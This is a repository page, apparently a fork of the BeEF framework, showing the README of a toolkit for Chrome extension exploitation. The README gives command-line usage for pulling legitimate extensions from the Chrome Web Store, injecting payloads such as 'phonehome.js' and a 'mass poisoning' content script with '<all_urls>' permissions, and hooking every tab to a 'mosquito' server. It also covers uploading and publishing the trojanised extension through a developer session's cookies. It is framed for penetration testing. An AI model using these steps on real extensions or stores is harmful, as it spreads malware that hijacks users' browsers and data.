Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d3e1d5b5065658f3a6c545f56c9b88ad2e396e27
beef/tools/chrome_extensions_exploitation
History
Krzysztof Kotowicz 3947bac044 added payloads
2014-03-22 11:28:27 +01:00
..
injector
added new files, readme and contact info
2014-03-18 12:56:57 +01:00
payloads
added payloads
2014-03-22 11:28:27 +01:00
webstore_uploader
Added Chrome Extension exploitation tools from me and Kkotowicz.
2014-03-16 15:45:16 +00:00
README.md
added new files, readme and contact info
2014-03-18 12:56:57 +01:00

README.md

Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.

Authors:

  • Krzysztof Kotowicz - @kkotowicz - blog
  • Michele '@antisnatchor' Orru

Injector

Bunch of scripts for injecting existing extensions with new code: Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).

Requirements:

  • bash
  • ruby
  • zip (cmd line)
  • curl (cmd line)
  • Google Chrome (used in crx mode only)

Usage:

# get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

# Same, but pack into repacked.zip instead
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

# Create new CRX with Google Chrome
$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

# Inject into existing CRX file
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js

# Add some permissions into manifest.json
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"

# Add persistent content script file launching on every tab
$ echo 'console.log(location.href)' > cs.js
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

For example - mass poisoning every tab with mosquito:

# start mosquito server:
$ cd path/to/mosquito 
$ python mosquito/start.py 8082 4444 --http 8000

# generate mosquito hook:
# - visit http://localhost:8000/generate
# - save hook as cs.js

# inject mosquito dropper into extension:
$ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

Webstore Uploader

Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store

Requirements:

  • ruby

Usage:

# Preparation:

1. Create Chrome developer account
2. Login at https://chrome.google.com/webstore/developer/dashboard/
3. Pay your $5 one time fee (credit card needed)
4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file

# Get Chrome extension code
#  e.g. run Injector in zip mode:

$ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js

# (optional) - prepare screenshot / description file

# publish the extension right away
$ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png

# or just upload & save it:
$ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png

# you can access the extension from your developer dashboard
Reference in New Issue View Git Blame Copy Permalink